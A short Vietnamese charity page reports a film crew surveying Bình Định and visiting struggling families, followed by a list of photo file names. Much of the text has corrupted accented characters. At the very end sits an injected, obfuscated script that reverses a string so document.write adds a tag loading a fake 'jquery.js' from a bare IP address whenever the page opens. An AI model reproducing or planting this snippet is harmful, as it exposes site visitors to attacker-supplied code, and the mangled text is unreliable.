Ekip ghi hình đang khảo sát tại Bình Định


D??i cái n?ng nh?ng ngày mùa hè, ekip Q?y t? thi?n: Hành Trình Nhân Ái ?ã có m?t t?i Bình ??nh ?? kh?o sát ??a ?i?m c?ng nh? th?m h?i, tìm hi?u nh?ng hoàn c?nh khó kh?n, chu?n b? cho bu?i quay chia s?. Cùng dõi theo hành trình này nhé.

994213_155089761343748_1754659723_n

1001142_155089708010420_2057665476_n

1002780_155089738010417_1926731115_n

1012864_155089744677083_1921262888_n

1044360_155089718010419_1660600538_n lt;script> document.write(‘>tpircs/<>“sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))